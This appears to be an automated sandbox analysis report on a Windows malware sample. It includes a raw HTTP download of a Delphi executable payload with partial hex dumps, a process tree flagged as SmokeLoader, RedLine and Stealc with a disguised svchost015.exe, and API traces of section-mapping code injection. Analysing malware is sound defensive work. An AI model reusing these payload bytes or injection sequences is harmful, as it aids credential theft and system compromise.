                                                  2024-09-02 06:21:13 UTC533INHTTP/1.1 200 OK
                                                  Server: hcdn
                                                  Date: Mon, 02 Sep 2024 06:21:13 GMT
                                                  Content-Type: application/x-executable
                                                  Content-Length: 3639176
                                                  Connection: close
                                                  last-modified: Sun, 01 Sep 2024 09:33:03 GMT
                                                  etag: "378788-66d434cf-b3fea62b77a48d21;;;"
                                                  platform: hostinger
                                                  panel: hpanel
                                                  content-security-policy: upgrade-insecure-requests
                                                  x-turbo-charged-by: LiteSpeed
                                                  alt-svc: h3=":443"; ma=86400
                                                  x-hcdn-request-id: ae6aa6841d724889bd61bb1041855083-bos-edge3
                                                  x-hcdn-cache-status: MISS
                                                  x-hcdn-upstream-rt: 0.008
                                                  Accept-Ranges: bytes
                                                  2024-09-02 06:21:13 UTC836INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: MZP@!L!This program must be run under Win32$7
                                                  2024-09-02 06:21:13 UTC1369INData Raw: 00 d0 37 00 00 00 00 00 00 66 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 40 10 40 00 01 07 49
                                                  Data Ascii: 7f7@P@Boolean@FalseTrue@,@Char@@I
                                                  2024-09-02 06:21:13 UTC1369INData Raw: e8 56 ff ff ff 84 c0 75 04 33 c0 89 06 5a 5d 5f 5e 5b c3 53 56 57 55 83 c4 f8 8b d8 8b fb 8b 32 8b 43 08 3b f0 72 70 8b ce 03 4a 04 8b e8 03 6b 0c 3b cd 77 62 3b f0 75 1b 8b 42 04 01 43 08 8b 42 04 29 43 0c 83 7b 0c 00 75 48 8b c3 e8 39 ff ff ff eb 3f 8b ce 8b 7a 04 03 cf 8b e8 03 6b 0c 3b cd 75 05 29 7b 0c eb 2a 8b 0a 03 4a 04 89 0c 24 8b 7b 08 03 7b 0c 2b f9 89 7c 24 04 2b f0 89 73 0c 8b d4 8b c3 e8 d0 fe ff ff 84 c0 75 04 33 c0 eb 0c b0 01 eb 08 8b 1b 3b fb 75 81 33 c0 59 5a 5d 5f 5e 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 73 04 6a 01 68 00 20 00 00 56 6a 00 e8 f8 fd ff ff 8b f8 89 3b 85 ff 74 23 8b d3 b8 ec 85 45 00 e8 6c fe ff ff 84 c0 75 13 68 00 80 00 00 6a 00 8b 03 50 e8 d9
                                                  Data Ascii: Vu3Z]_^[SVWU2C;rpJk;wb;uBCB)C{uH9?zk;u){*J${{+|$+su3;u3YZ]_^[SVW}sjh Vj;t#EluhjP
                                                  2024-09-02 06:21:13 UTC1369INData Raw: 26 fc ff ff 8b 44 24 0c 89 44 24 04 8b 44 24 10 89 44 24 08 83 7c 24 04 00 74 14 8d 54 24 04 b8 fc 85 45 00 e8 91 fa ff ff eb 04 33 c0 89 07 83 c4 14 5f 5e 5b c3 55 8b ec 33 d2 55 68 e2 1a 40 00 64 ff 32 64 89 22 68 cc 85 45 00 e8 39 f9 ff ff 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 2e f9 ff ff b8 ec 85 45 00 e8 8c f9 ff ff b8 fc 85 45 00 e8 82 f9 ff ff b8 28 86 45 00 e8 78 f9 ff ff 68 f8 0f 00 00 6a 00 e8 dc f8 ff ff a3 24 86 45 00 83 3d 24 86 45 00 00 74 2f b8 03 00 00 00 8b 15 24 86 45 00 33 c9 89 4c 82 f4 40 3d 01 04 00 00 75 ec b8 0c 86 45 00 89 40 04 89 00 a3 18 86 45 00 c6 05 c4 85 45 00 01 33 c0 5a 59 59 64 89 10 68 e9 1a 40 00 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 af f8 ff ff c3 e9 71 1d 00 00 eb e5 a0 c4 85 45 00 5d c3 55 8b ec 53 80
                                                  Data Ascii: &D$D$D$D$|$tT$E3_^[U3Uh@d2d"hE9=MEthE.EE(Exhj$E=$Et/$E3L@=uE@EE3ZYYdh@=MEthEqE]US
                                                  2024-09-02 06:21:13 UTC1369INData Raw: 47 04 8b f3 03 74 24 0c 3b c6 73 08 e8 f0 fd ff ff 01 47 04 8b 07 03 47 04 3b f0 75 11 83 e8 04 ba 04 00 00 00 e8 eb fc ff ff 83 6f 04 04 8b 07 a3 20 86 45 00 8b 47 04 a3 1c 86 45 00 b0 01 83 c4 10 5f 5e 5b c3 8d 40 00 53 83 c4 f8 8b d8 8b d4 8d 43 04 e8 44 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 57 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5b c3 90 53 56 83 c4 f8 8b f2 8b d8 8b cc 8d 56 04 8b c3 e8 a3 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 26 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5e 5b c3 8d 40 00 33 d2 85 c0 79 03 83 c0 03 c1 f8 02 3d 00 04 00 00 7f 16 8b 15 24 86 45 00 8b 54 82 f4 85 d2 75 08 40 3d 01 04 00 00 75 ea 8b c2 c3 53 56 57 55 8b f0 bf 18 86 45 00 bd 1c 86 45 00 8b 1d 10 86 45 00 3b 73 08 0f 8e 84 00 00 00 8b 1f 8b 43 08 3b f0 7e 7b 89 73
                                                  Data Ascii: Gt$;sGG;uo EGE_^[@SCD<$tWu3YZ[SVV<$t&u3YZ^[@3y=$ETu@=uSVWUEEE;sC;~{s
                                                  2024-09-02 06:21:13 UTC1369INData Raw: 05 1c 86 45 00 83 3d 1c 86 45 00 0c 0f 8d 4c 01 00 00 8b 04 24 01 05 20 86 45 00 8b 04 24 29 05 1c 86 45 00 8b f7 e9 33 01 00 00 8b d8 f6 03 02 75 0d 8b c3 8b 50 08 01 14 24 e8 e9 f6 ff ff 83 3c 24 0c 7c 1b 8b dd 03 de 8b 04 24 83 c8 02 89 03 8b c3 83 c0 04 e8 91 f7 ff ff e9 fe 00 00 00 8b f7 e9 f7 00 00 00 8b c6 2b c7 89 44 24 04 3b 1d 20 86 45 00 75 67 a1 1c 86 45 00 3b 44 24 04 7c 53 8b 44 24 04 29 05 1c 86 45 00 8b 44 24 04 01 05 20 86 45 00 83 3d 1c 86 45 00 0c 7d 18 a1 1c 86 45 00 01 05 20 86 45 00 03 35 1c 86 45 00 33 c0 a3 1c 86 45 00 8b c6 2b c7 01 05 b8 85 45 00 8b 45 00 25 03 00 00 80 0b f0 89 75 00 b0 01 e9 a2 00 00 00 e8 3e f9 ff ff 8b dd 03 df f6 03 02 75 4d 8b d3 8b c2 8b 48 08 89 0c 24 8b 0c 24 3b 4c 24 04 7d 0e 03 14 24 8b da 8b 04 24 29
                                                  Data Ascii: E=EL$ E$)E3uP$<$|$+D$; EugE;D$|SD$)ED$ E=E}E E5E3E+EE%u>uMH$$;L$}$$)
                                                  2024-09-02 06:21:13 UTC1369INData Raw: 6f fe ff ff eb 12 81 fb 50 80 45 00 74 0a b8 67 00 00 00 e8 5b fe ff ff 8b c6 5e 5b c3 8b c0 53 8a 1a 3a cb 76 02 8b cb 88 08 42 40 81 e1 ff 00 00 00 92 e8 af fe ff ff 5b c3 90 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 44 4a 74 15 8b 4e 04 8b 5f 04 39 d9 75 37 83 c6 08 83 c7 08 4a 75 e2 eb 06 83 c6 04 83 c7 04 5a 83 e2 03 74 1c 8a 0e 3a 0f 75 2f 4a 74 13 8a 4e 01 3a 4f 01 75 24 4a 74 08 8a 4e 02 3a 4f 02 75 19 01 c0 eb 15 5a 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a
                                                  Data Ascii: oPEtg[^[S:vB@[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0Nt
                                                  2024-09-02 06:21:13 UTC1369INData Raw: 8b c0 53 33 db 6a 00 e8 ee ff ff ff 83 f8 07 75 1c 6a 01 e8 e2 ff ff ff 25 00 ff 00 00 3d 00 0d 00 00 74 07 3d 00 04 00 00 75 02 b3 01 8b c3 5b c3 90 55 8b ec 83 c4 f4 0f b7 05 20 60 45 00 89 45 f8 8d 45 fc 50 6a 01 6a 00 68 24 30 40 00 68 02 00 00 80 e8 31 e3 ff ff 85 c0 75 4d 33 c0 55 68 fd 2f 40 00 64 ff 30 64 89 20 c7 45 f4 04 00 00 00 8d 45 f4 50 8d 45 f8 50 6a 00 6a 00 68 40 30 40 00 8b 45 fc 50 e8 06 e3 ff ff 33 c0 5a 59 59 64 89 10 68 04 30 40 00 8b 45 fc 50 e8 e0 e2 ff ff c3 e9 56 08 00 00 eb ef 66 a1 20 60 45 00 66 25 c0 ff 66 8b 55 f8 66 83 e2 3f 66 0b c2 66 a3 20 60 45 00 8b e5 5d c3 00 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 00 00 00 00 db e3 9b d9 2d 20 60 45 00
                                                  Data Ascii: S3juj%=t=u[U `EEEPjjh$0@h1uM3Uh/@d0d EEPEPjjh@0@EP3ZYYdh0@EPVf `Ef%fUf?ff `E]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- `E
                                                  2024-09-02 06:21:13 UTC1369INData Raw: 0e ff 15 14 80 45 00 c3 90 80 3d 28 60 45 00 00 74 17 50 50 52 54 6a 02 6a 00 68 e4 fa ed 0e ff 15 14 80 45 00 83 c4 08 58 c3 8d 40 00 54 6a 01 6a 00 68 e0 fa ed 0e ff 15 14 80 45 00 83 c4 04 58 c3 8d 40 00 80 3d 28 60 45 00 01 76 09 50 ff 73 04 e9 d6 ff ff ff c3 90 80 3d 28 60 45 00 01 76 07 50 53 e9 c4 ff ff ff c3 8d 40 00 85 c9 74 19 8b 41 01 80 39 e9 74 0c 80 39 eb 75 0c 0f be c0 41 41 eb 03 83 c1 05 01 c1 c3 8b c0 80 3d 28 60 45 00 01 76 1d 50 52 51 e8 cf ff ff ff 51 54 6a 01 6a 00 68 e1 fa ed 0e ff 15 14 80 45 00 59 59 5a 58 c3 90 80 3d 28 60 45 00 01 76 12 52 54 6a 01 6a 00 68 e2 fa ed 0e ff 15 14 80 45 00 5a c3 50 52 80 3d 28 60 45 00 01 76 10 54 6a 02 6a 00 68 e3 fa ed 0e ff 15 14 80 45 00 5a 58 c3 8b c0 8b 44 24 04 f7 40 04 06 00 00 00 0f 85 13
                                                  Data Ascii: E=(`EtPPRTjjhEX@TjjhEX@=(`EvPs=(`EvPS@tA9t9uAA=(`EvPRQQTjjhEYYZX=(`EvRTjjhEZPR=(`EvTjjhEZXD$@
                                                  2024-09-02 06:21:13 UTC1369INData Raw: 77 0f 8d 44 24 04 50 e8 24 d8 ff ff 83 f8 00 74 71 8b 44 24 04 fc e8 29 f6 ff ff 8b 54 24 08 6a 00 50 68 3a 3a 40 00 52 ff 15 18 80 45 00 8b 5c 24 04 81 3b de fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 10 80 45 00 85 d2 0f 84 fa fe ff ff 89 d8 ff d2 85 c0 0f 84 ee fe ff ff 8b 53 0c e8 16 fb ff ff 8b 0d 04 80 45 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 ba 03 00 00 31 c0 c3 8d 40 00 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 f4 39 40 00 89 68 08 a3 3c 86 45 00 c3 8d 40 00 31 d2 a1 3c 86 45 00 85 c0 74 1c 64 8b 0a 39 c8 75 08 8b 00 64 89 02 c3 8b 09 83 f9 ff 74 08 39 01 75 f5 8b 00 89 01 c3 55 8b ec 53 56 57 bf 38 86 45 00 8b 47 08 85 c0 74 48 8b 5f 0c 8b 70 04 33 d2 55 68 22 3b 40 00 64 ff 32 64 89 22 85 db 7e 12 4b 89 5f 0c 8b
                                                  Data Ascii: wD$P$tqD$)T$jPh::@RE\$;SCtESEtL$Q$1@1Edd@9@h<E@1<Etd9udt9uUSVW8EGtH_p3Uh";@d2d"~K_


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:02:20:12
                                                  Start date:02/09/2024
                                                  Path:C:\Users\user\Desktop\oZB7n3wuNk.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\oZB7n3wuNk.exe"
                                                  Imagebase:0x400000
                                                  File size:413'184 bytes
                                                  MD5 hash:A4BC249DC997DF25A0E709EEE0A0DF87
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:02:20:17
                                                  Start date:02/09/2024
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff609140000
                                                  File size:5'141'208 bytes
                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:02:20:36
                                                  Start date:02/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\birajci
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\birajci
                                                  Imagebase:0x400000
                                                  File size:413'184 bytes
                                                  MD5 hash:A4BC249DC997DF25A0E709EEE0A0DF87
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 63%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:02:21:15
                                                  Start date:02/09/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\9A25.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\9A25.exe
                                                  Imagebase:0x7ff7934f0000
                                                  File size:3'639'176 bytes
                                                  MD5 hash:17D51083CCB2B20074B1DC2CAC5BEA36
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 38%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:02:21:20
                                                  Start date:02/09/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\svchost015.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\svchost015.exe
                                                  Imagebase:0x400000
                                                  File size:2'990'472 bytes
                                                  MD5 hash:B826DD92D78EA2526E465A34324EBEEA
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 4%, ReversingLabs
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:02:21:48
                                                  Start date:02/09/2024
                                                  Path:C:\Windows\System32\WerFault.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 4004 -s 9264
                                                  Imagebase:0x7ff72b340000
                                                  File size:570'736 bytes
                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:02:21:50
                                                  Start date:02/09/2024
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:explorer.exe
                                                  Imagebase:0x7ff609140000
                                                  File size:5'141'208 bytes
                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:9.1%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:49.6%
                                                    Total number of Nodes:117
                                                    Total number of Limit Nodes:2
                                                    execution_graph 3246 402ee1 3247 402e69 3246->3247 3249 402e9c 3246->3249 3248 401869 8 API calls 3247->3248 3248->3249 3131 7a003c 3132 7a0049 3131->3132 3144 7a0e0f SetErrorMode SetErrorMode 3132->3144 3137 7a0265 3138 7a02ce VirtualProtect 3137->3138 3140 7a030b 3138->3140 3139 7a0439 VirtualFree 3143 7a04be LoadLibraryA 3139->3143 3140->3139 3142 7a08c7 3143->3142 3145 7a0223 3144->3145 3146 7a0d90 3145->3146 3147 7a0dad 3146->3147 3148 7a0dbb GetPEB 3147->3148 3149 7a0238 VirtualAlloc 3147->3149 3148->3149 3149->3137 3150 64a4c2 3153 64a4c8 3150->3153 3154 64a4d7 3153->3154 3157 64ac68 3154->3157 3158 64ac83 3157->3158 3159 64ac8c CreateToolhelp32Snapshot 3158->3159 3160 64aca8 Module32First 3158->3160 3159->3158 3159->3160 3161 64acb7 3160->3161 3162 64a4c7 3160->3162 3164 64a927 3161->3164 3165 64a952 3164->3165 3166 64a963 VirtualAlloc 3165->3166 3167 64a99b 3165->3167 3166->3167 3167->3167 3315 402d69 3316 402d87 3315->3316 3317 401869 8 API calls 3316->3317 3318 402e9c 3316->3318 3317->3318 3274 4014aa 3275 4014a2 3274->3275 3276 401543 NtDuplicateObject 3275->3276 3285 40165f 3275->3285 3277 401560 NtCreateSection 3276->3277 3276->3285 3278 4015e0 NtCreateSection 3277->3278 3279 401586 NtMapViewOfSection 3277->3279 3281 40160c 3278->3281 3278->3285 3279->3278 3280 4015a9 NtMapViewOfSection 3279->3280 3280->3278 3282 4015c7 3280->3282 3283 401616 NtMapViewOfSection 3281->3283 3281->3285 3282->3278 3284 40163d NtMapViewOfSection 3283->3284 3283->3285 3284->3285 3168 402e0b 3171 402e0e 3168->3171 3170 402e9c 3171->3170 3172 401869 3171->3172 3173 401877 3172->3173 3174 4018af Sleep 3173->3174 3175 4018ca 3174->3175 3177 4018db 3175->3177 3178 401493 3175->3178 3177->3170 3179 4014a2 3178->3179 3180 401543 NtDuplicateObject 3179->3180 3189 40165f 3179->3189 3181 401560 NtCreateSection 3180->3181 3180->3189 3182 4015e0 NtCreateSection 3181->3182 3183 401586 NtMapViewOfSection 3181->3183 3185 40160c 3182->3185 3182->3189 3183->3182 3184 4015a9 NtMapViewOfSection 3183->3184 3184->3182 3186 4015c7 3184->3186 3187 401616 NtMapViewOfSection 3185->3187 3185->3189 3186->3182 3188 40163d NtMapViewOfSection 3187->3188 3187->3189 3188->3189 3189->3177 3310 4030b2 3311 4030c5 3310->3311 3312 403094 NtTerminateProcess 3311->3312 3314 4030d3 3311->3314 3313 4030ac 3312->3313 3314->3314 3190 401874 3191 401899 3190->3191 3192 4018af Sleep 3191->3192 3193 4018ca 3192->3193 3194 401493 7 API calls 3193->3194 3195 4018db 3193->3195 3194->3195 3126 402f55 3127 4030ac 3126->3127 3128 402f7f 3126->3128 3128->3127 3129 40303a RtlCreateUserThread 3128->3129 3130 403094 NtTerminateProcess 3129->3130 3130->3127 3196 401476 3197 401422 3196->3197 3197->3196 3198 401543 NtDuplicateObject 3197->3198 3207 4013c0 3197->3207 3199 401560 NtCreateSection 3198->3199 3198->3207 3200 4015e0 NtCreateSection 3199->3200 3201 401586 NtMapViewOfSection 3199->3201 3203 40160c 3200->3203 3200->3207 3201->3200 3202 4015a9 NtMapViewOfSection 3201->3202 3202->3200 3204 4015c7 3202->3204 3205 401616 NtMapViewOfSection 3203->3205 3203->3207 3204->3200 3206 40163d NtMapViewOfSection 3205->3206 3205->3207 3206->3207 3208 7a0001 3209 7a0005 3208->3209 3214 7a092b GetPEB 3209->3214 3211 7a0030 3216 7a003c 3211->3216 3215 7a0972 3214->3215 3215->3211 3217 7a0049 3216->3217 3218 7a0e0f 2 API calls 3217->3218 3219 7a0223 3218->3219 3220 7a0d90 GetPEB 3219->3220 3221 7a0238 VirtualAlloc 3220->3221 3222 7a0265 3221->3222 3223 7a02ce VirtualProtect 3222->3223 3225 7a030b 3223->3225 3224 7a0439 VirtualFree 3228 7a04be LoadLibraryA 3224->3228 3225->3224 3227 7a08c7 3228->3227 3229 7a0005 3230 7a092b GetPEB 3229->3230 3231 7a0030 3230->3231 3232 7a003c 7 API calls 3231->3232 3233 7a0038 3232->3233

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 85 401476-401478 86 4014c0-4014ed call 40110f 85->86 87 401479-40147a 85->87 101 4014f2-4014f7 86->101 102 4014ef 86->102 88 401422 87->88 89 40147c-401481 87->89 93 4013c0-4013de call 40110f 88->93 94 401424-401451 88->94 91 401483-401490 89->91 104 4013f9-4013fa 93->104 103 401453-401470 94->103 94->104 110 401818-401820 101->110 111 4014fd-40150e 101->111 102->101 103->91 105 401472-401474 103->105 105->85 110->101 116 401825-40184b 110->116 114 401514-40153d 111->114 115 401816 111->115 114->115 123 401543-40155a NtDuplicateObject 114->123 115->116 124 40183c-401847 116->124 125 40184e-401866 call 40110f 116->125 123->115 127 401560-401584 NtCreateSection 123->127 124->125 129 4015e0-401606 NtCreateSection 127->129 130 401586-4015a7 NtMapViewOfSection 127->130 129->115 133 40160c-401610 129->133 130->129 132 4015a9-4015c5 NtMapViewOfSection 130->132 132->129 135 4015c7-4015dd 132->135 133->115 136 401616-401637 NtMapViewOfSection 133->136 135->129 136->115 137 40163d-401659 NtMapViewOfSection 136->137 137->115 139 40165f call 401664 137->139
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: Section$CreateDuplicateObjectView
                                                    • String ID:
                                                    • API String ID: 1652636561-0
                                                    • Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
                                                    • Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
                                                    • Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
                                                    • Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
